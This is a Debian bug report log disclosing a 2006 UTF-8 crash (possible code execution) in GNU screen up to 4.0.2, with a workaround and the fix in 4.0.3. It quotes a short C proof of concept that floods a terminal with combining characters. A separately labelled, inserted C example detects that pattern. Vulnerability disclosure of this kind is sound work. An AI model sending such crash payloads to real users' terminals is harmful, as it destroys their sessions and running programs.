Debian Bug report logs - #395999
Remote DoS and possible code execution in screen <= 4.0.2


Package: screen; Maintainer for screen is Axel Beckert <abe@debian.org>; Source for screen is src:screen.

Reported by: friedel@nomaden.org

Date: Sun, 29 Oct 2006 11:18:02 UTC

Severity: grave

Tags: fixed-upstream, patch, security

Merged with 395225

Found in version screen/4.0.2-4.1

Fixed in versions screen/4.0.3-0.1, 4.0.3-0.1

Done: Moritz Muehlenhoff <jmm@inutil.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Adam Lazur <zal@debian.org>:
Bug#395999; Package screen.

Acknowledgement sent to friedel@nomaden.org:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Adam Lazur <zal@debian.org>.

Message #5 received at submit@bugs.debian.org:

From: Friedrich Delgado Friedrichs <friedel@nomaden.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Remote DoS and possible code execution in screen <= 4.0.2
Date: Sun, 29 Oct 2006 12:09:21 +0100
Package: screen
Version: 4.0.2-4.1
Severity: critical
Tags: security
Justification: breaks unrelated software


The following proof-of-concept exploit (by dalias @ #screen on
freenode.net, real name not known, probably (hopefully) he's one of the
guys credited in the upstream security announcement) will crash a
screen session with utf8 enabled. (:utf8 on, :defutf8 on)

#include <locale.h>
#include <wchar.h>
#include <stdio.h>
int main() {
 setlocale(LC_CTYPE, "");
 wchar_t i, j, k;
 /* each printable ASCII character followed by two characters from 0x300..0x36f */
 for (i=' '; i<0x7f; i++)
  for (j=0x300; j<0x370; j++)
   for (k=0x300; k<0x370; k++)
    printf("%lc%lc%lc", i, j, k);
}

A workaround is to disable utf8. ("defutf8 off" in screenrc)

Upstream security announcement is at http://lists.gnu.org/archive/html/screen-users/2006-10/msg00028.html

The whole screen session with all programs running in it will get lost
(hence: "breaks unrelated software") and this can be triggered by any
software sending utf-8 characters to the terminal (such as a console
mail or news reader or irc client).

This is a *possible* remote code execution, because in the debugger
some registers are reportedly overwritten.

Kind regards
     Friedel
-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (990, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-1-k7
Locale: LANG=de_DE.utf8, LC_CTYPE=de_DE.utf8 (charmap=UTF-8) (ignored: LC_ALL set to de_DE.utf8)

Versions of packages screen depends on:
ii  base-passwd                 3.5.11       Debian base system master password
ii  debconf                     1.5.7        Debian configuration management sy
ii  libc6                       2.3.6.ds1-7  GNU C Library: Shared libraries
ii  libncursesw5                5.5-5        Shared libraries for terminal hand
ii  libpam0g                    0.79-4       Pluggable Authentication Modules l
ii  passwd                      1:4.0.18.1-5 change and administer password and

screen recommends no packages.

-- debconf information:
  screen/old_upgrade_prompt: false
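
Added example, not part of the bug report and not screen's own code: a check that measures the longest run of consecutive characters in the U+0300..U+036F range in a UTF-8 buffer, the pattern the proof of concept above emits, so that untrusted text can be inspected before it is written to a terminal. The function names and the sample buffer are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed sample: 'A' followed by U+0300 and U+0301, one PoC-style triple. */
static const unsigned char sample_triple[] = "A\xCC\x80\xCC\x81";

/* Decode one UTF-8 sequence from s[0..n). Returns the bytes consumed (>= 1)
 * and stores the code point in *cp, or U+FFFD for a malformed sequence. */
static size_t utf8_decode(const unsigned char *s, size_t n, uint32_t *cp)
{
    static const uint32_t min_cp[4] = { 0, 0x80, 0x800, 0x10000 };
    size_t len, i;
    uint32_t c = s[0];

    if (c < 0x80)                { *cp = c; return 1; }
    else if ((c & 0xE0) == 0xC0) { len = 2; c &= 0x1F; }
    else if ((c & 0xF0) == 0xE0) { len = 3; c &= 0x0F; }
    else if ((c & 0xF8) == 0xF0) { len = 4; c &= 0x07; }
    else                         { *cp = 0xFFFD; return 1; }

    if (len > n) { *cp = 0xFFFD; return 1; }      /* truncated sequence */
    for (i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) { *cp = 0xFFFD; return 1; }
        c = (c << 6) | (s[i] & 0x3F);
    }
    /* Reject overlong forms, surrogates and values past U+10FFFF. */
    if (c < min_cp[len - 1] || c > 0x10FFFF || (c >= 0xD800 && c <= 0xDFFF))
        c = 0xFFFD;
    *cp = c;
    return len;
}

/* Longest run of consecutive code points in U+0300..U+036F, the range the
 * proof of concept draws its second and third characters from. */
size_t max_combining_run(const unsigned char *buf, size_t n)
{
    size_t pos = 0, run = 0, best = 0;
    while (pos < n) {
        uint32_t cp;
        pos += utf8_decode(buf + pos, n - pos, &cp);
        if (cp >= 0x300 && cp <= 0x36F) {
            if (++run > best) best = run;
        } else {
            run = 0;
        }
    }
    return best;
}
```

A run of 1 is what ordinary accented text produces; the triples printed by the proof of concept give a run of 2.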



Tags added: fixed-upstream Request was from Andreas Henriksson <andreas@fatal.se> to control@bugs.debian.org.

Forcibly Merged 395225 395999. Request was from Andreas Henriksson <andreas@fatal.se> to control@bugs.debian.org.

Message #10 received at 395999-done@bugs.debian.org:

From: Adam Lazur <zal@debian.org>
To: friedel@nomaden.org, 395999-done@bugs.debian.org
Subject: Re: Bug#395999: Remote DoS and possible code execution in screen <= 4.0.2
Date: Sun, 29 Oct 2006 09:37:45 -0800
Friedrich Delgado Friedrichs (friedel@nomaden.org) said:
> Package: screen
> Version: 4.0.2-4.1
> Severity: critical
> Tags: security
> Justification: breaks unrelated software
> 
> 
> The following proof-of-concept exploit (by dalias @ #screen on
> freenode.net, real name not known, probably (hopefully) he's one of the
> guys credited in the upstream security announcement) will crash a
> screen session with utf8 enabled. (:utf8 on, :defutf8 on)

This is fixed in screen package 4.0.3-0.1

-- 
Adam Lazur



Reply sent to Moritz Muehlenhoff <jmm@inutil.org>:
You have taken responsibility.

Notification sent to friedel@nomaden.org:
Bug acknowledged by developer.

Message #15 received at 395999-done@bugs.debian.org:

From: Moritz Muehlenhoff <jmm@inutil.org>
To: 395999-done@bugs.debian.org
Subject: Closing with proper version header
Date: Sun, 29 Oct 2006 23:10:31 +0100
Version: 4.0.3-0.1

# Closing versioned, so that it's properly tracked for testing



Reply sent to Moritz Muehlenhoff <jmm@inutil.org>:
You have taken responsibility.

Notification sent to Stefan Fritsch <sf@sfritsch.de>:
Bug acknowledged by developer.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 24 Jun 2007 23:26:16 GMT)
